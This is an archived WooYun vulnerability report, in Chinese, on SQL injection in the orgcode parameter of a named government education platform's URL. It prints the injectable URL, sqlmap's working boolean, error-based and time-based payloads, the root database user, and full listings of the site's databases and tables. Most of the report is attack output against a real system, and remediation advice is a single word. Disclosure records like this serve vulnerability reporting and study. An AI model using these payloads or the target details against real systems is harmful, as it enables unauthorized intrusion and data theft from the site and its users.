乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-02: 细节已通知厂商并且等待厂商处理中 2015-02-06: 厂商已经确认,细节仅向厂商公开 2015-02-16: 细节向核心白帽子及相关领域专家公开 2015-02-26: 细节向普通白帽子公开 2015-03-08: 细节向实习白帽子公开 2015-03-19: 细节向公众公开
快升级了,好鸡冻。
中央电化教育馆教育教学综合应用系统,下网络空间站点:http://rrt.cer.com.cn/存在注入:http://rrt.cer.com.cn/schoolspace.php?orgcode=0000000000'报错信息:
Sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orgcode Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: orgcode=0000000000' RLIKE (SELECT (CASE WHEN (1188=1188) THEN 0000000000 ELSE 0x28 END)) AND 'GKjO'='GKjO Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: orgcode=0000000000' AND (SELECT 9207 FROM(SELECT COUNT(*),CONCAT(0x7173757871,(SELECT (CASE WHEN (9207=9207) THEN 1 ELSE 0 END)),0x7161706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NKxj'='NKxj Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: orgcode=-9235' OR 9918=SLEEP(5) AND 'JlZF'='JlZF---web application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL >= 5.0.0current user: 'root@%'current database: 'rrt_home'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
所有数据库:
web application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL >= 5.0.0available databases [27]:[*] content_editor[*] hxdp[*] information_schema[*] jse_app[*] jse_ask[*] jse_base[*] jse_cardsum[*] jse_chelp[*] jse_cms[*] jse_contents[*] jse_module[*] jse_pay[*] jse_platform[*] jse_record[*] jse_resources[*] jse_school[*] jse_school_room[*] jse_second[*] jse_shorturl[*] jse_storage[*] jse_usercenter[*] mysql[*] performance_schema[*] rrt_center[*] rrt_home[*] sitecounter[*] test
表:
web application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL >= 5.0.0Database: rrt_home[152 tables]+-----------------------------------+| uchome_activity || uchome_activity_log || uchome_ad || uchome_adminsession || uchome_album || uchome_announcement || uchome_api_cache || uchome_app || uchome_appcreditlog || uchome_apply || uchome_applycourse || uchome_applyrules || uchome_apptype || uchome_attachment || uchome_blacklist || uchome_block || uchome_blog || uchome_blogfield || uchome_bureau_info || uchome_cache || uchome_class || uchome_class_info || uchome_class_msg || uchome_classmeta || uchome_click || uchome_clickuser || uchome_college_info || uchome_comment || uchome_config || uchome_course || uchome_creditlog || uchome_creditrule || uchome_cron || uchome_data || uchome_docomment || uchome_doing || uchome_download_resource || uchome_event || uchome_eventclass || uchome_eventfield || uchome_eventinvite || uchome_eventpic || uchome_feed || uchome_feed_school || uchome_friend || uchome_friendgroup || uchome_friendguide || uchome_friendlog || uchome_invite || uchome_log || uchome_magic || uchome_magicinlog || uchome_magicstore || uchome_magicuselog || uchome_mailcron || uchome_mailqueue || uchome_member || uchome_moudle_to_system || uchome_moudle_to_user || uchome_mtag || uchome_mtaginvite || uchome_myapp || uchome_myinvite || uchome_notification || uchome_photo_ad || uchome_pic || uchome_picfield || uchome_poke || uchome_poll || uchome_pollfield || uchome_polloption || uchome_polluser || uchome_post || uchome_post_add_paper || uchome_post_answer || uchome_post_make_lesson || uchome_post_mark_exam || uchome_post_paper_marked || uchome_post_question || uchome_post_teach_arrange || uchome_powerful_usermoudles || uchome_powerful_usermoudles_cache || uchome_powerful_usermoudles_par || uchome_powerful_usermoudles_val || uchome_profield || uchome_profilefield || uchome_recommend || uchome_report || uchome_resource || uchome_resource_back_delete || uchome_rules || uchome_school_info || uchome_school_stepage || uchome_scrollimage || uchome_session || uchome_share || uchome_show || uchome_space || uchome_space_t || uchome_space_title || uchome_spacefield || uchome_spaceinfo || uchome_spacelog || uchome_specialty || uchome_sq_activity || uchome_sq_activity_experience || uchome_sq_activity_member || uchome_sq_activity_stage || uchome_sq_album || uchome_sq_announcement || uchome_sq_announcement_att || uchome_sq_attachment || uchome_sq_class || uchome_sq_community || uchome_sq_community_member || uchome_sq_feed || uchome_sq_moudle || uchome_sq_moudle_to_space || uchome_sq_pic || uchome_sq_poll || uchome_sq_resource || uchome_sq_share || uchome_sq_space_info || uchome_sq_space_stepage || uchome_sq_spacedefined_moudles || uchome_sq_topimages || uchome_sq_visitor || uchome_stat || uchome_statuser || uchome_tag || uchome_tagblog || uchome_tagspace || uchome_task || uchome_teach || uchome_test || uchome_thread || uchome_topic || uchome_topicuser || uchome_topimages || uchome_urecommend || uchome_user_class || uchome_user_spec || uchome_userapp || uchome_userappfield || uchome_userdefined_moudles || uchome_userevent || uchome_usergroup || uchome_userlog || uchome_usermagic || uchome_users_setpage || uchome_usertask || uchome_visitor |+-----------------------------------+
未做过多操作。
如上。
过滤过滤。
危害等级:高
漏洞Rank:11
确认时间:2015-02-06 09:51
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无